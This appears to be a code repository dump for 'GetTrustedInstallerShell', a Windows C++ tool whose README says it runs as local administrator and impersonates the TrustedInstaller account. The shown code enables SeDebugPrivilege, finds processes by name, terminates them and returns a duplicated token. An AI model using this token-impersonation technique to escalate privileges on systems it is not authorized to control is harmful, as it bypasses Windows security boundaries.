214 | 		return INVALID_HANDLE_VALUE;
215 | 	}
216 | 	CloseHandle(hToken);
217 | 	return hNewToken;
218 | }
219 | 
220 | void PrintError(const char* msg, DWORD err) {
221 | 	if (err == -1) {
222 | 		// only print message
223 | 		printf(" [-] %s.", msg);
224 | 		return;
225 | 	}
226 | 	// use winapi formatmessage to retrieve descriptor for error code
227 | 	wchar_t* msgBuf = nullptr;
228 | 	FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, err, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (wchar_t*)&msgBuf, 0, NULL);
229 | 	_bstr_t b(msgBuf); const char* c = b;
230 | 	// print
231 | 	printf("[-] %s. err: %d %s", msg, err, c);
232 | 	LocalFree(msgBuf);
233 | }
234 | 
235 | bool GetDebugPrivilege() {
236 | 	// pretty self explanatory
237 | 	HANDLE hProcess = GetCurrentProcess();
238 | 	HANDLE hToken;
239 | 	if (OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken))
240 | 	{
241 | 		DWORD errCode = SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
242 | 		// if errcode is 0 then operation was successful
243 | 		return errCode == 0;
244 | 	}
245 | 	return false;
246 | }
247 | 
248 | DWORD SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
249 | 	LUID luid;
250 | 	// get current values for privilege
251 | 	if (LookupPrivilegeValueW(NULL, lpszPrivilege, &luid))
252 | 	{
253 | 		TOKEN_PRIVILEGES tp;
254 | 		memset(&tp, 0, sizeof(tp));
255 | 		tp.PrivilegeCount = 1;
256 | 		tp.Privileges[0].Luid = luid;
257 | 		// update this field
258 | 		tp.Privileges[0].Attributes = (bEnablePrivilege) ? SE_PRIVILEGE_ENABLED : 0;
259 | 		// adjust
260 | 		AdjustTokenPrivileges(hToken, FALSE, &tp, NULL, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);
261 | 	}
262 | 	// return error code. 0 on success
263 | 	return GetLastError();
264 | }
265 | 
266 | DWORD GetPidByName(const wchar_t* procName) {
267 | 	DWORD procId = 0;
268 | 	HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
269 | 
270 | 	if (hSnap != INVALID_HANDLE_VALUE) {
271 | 		PROCESSENTRY32 procEntry;
272 | 		memset(&procEntry, 0, sizeof(procEntry));
273 | 		procEntry.dwSize = sizeof(procEntry);
274 | 		// iterate through every process, checking if process name matches target
275 | 		if (Process32First(hSnap, &procEntry)) {
276 | 			do {
277 | 				if (!lstrcmpW(procEntry.szExeFile, procName)) {
278 | 					procId = procEntry.th32ProcessID;
279 | 					wprintf(L"[+] found process '%s'. pid: %d\n", procName, procId);
280 | 					break;
281 | 				}
282 | 			} while (Process32Next(hSnap, &procEntry));
283 | 		}
284 | 	}
285 | 	CloseHandle(hSnap);
286 | 	return procId;
287 | }
288 | 
289 | bool TerminateProcess(DWORD pid)
290 | {
291 | 	if (pid == 0) return false;
292 | 	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
293 | 	if (hProc == INVALID_HANDLE_VALUE) {
294 | 		PrintError("OpenProcess()", GetLastError());
295 | 		return false;
296 | 	}
297 | 	bool flag = true;
298 | 	if (!TerminateProcess(hProc, 1)) {
299 | 		PrintError("TerminateProcess()", GetLastError());
300 | 		flag = false;
301 | 	}
302 | 	CloseHandle(hProc);
303 | 	return flag;
304 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 wilszdev
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GetTrustedInstallerShell
2 | 
3 | run as local administrator.
4 | impersonates the trusted installer
5 | 


--------------------------------------------------------------------------------